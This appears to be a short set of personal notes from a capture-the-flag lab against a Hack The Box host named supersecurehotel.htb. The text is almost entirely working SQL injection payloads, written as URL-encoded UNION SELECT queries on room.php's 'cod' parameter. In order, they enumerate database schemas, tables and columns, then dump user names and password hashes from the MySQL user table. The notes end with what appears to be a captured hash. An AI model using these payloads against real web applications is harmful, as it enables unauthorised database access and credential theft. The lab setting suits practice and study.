
sql db

http://supersecurehotel.htb/room.php?cod=100%20UNION%20SELECT%201,group_concat(schema_name),3,4,5,6,7%20From%20information_schema.schemata;--%20-

table 

http://supersecurehotel.htb/room.php?cod=100%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7%20From%20information_schema.tables%20WHERE%20table_schema=%27hotel%27;--%20-


http://supersecurehotel.htb/room.php?cod=100%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7%20From%20information_schema.tables%20WHERE%20table_schema=%27mysql%27;--%20-

Column 

http://supersecurehotel.htb/room.php?cod=100%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7%20From%20information_schema.columns%20WHERE%20table_name=%27room%27;--%20-


http://supersecurehotel.htb/room.php?cod=100%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7%20From%20information_schema.columns%20WHERE%20table_name=%27user%27;--%20-



Value


http://supersecurehotel.htb/room.php?cod=100%20UNION%20SELECT%201,group_concat(User,0x7c,Password),3,4,5,6,7%20From%20user%;--%20-

2D2B7A5E4E637B8FBA1D17F40318F277D29964D0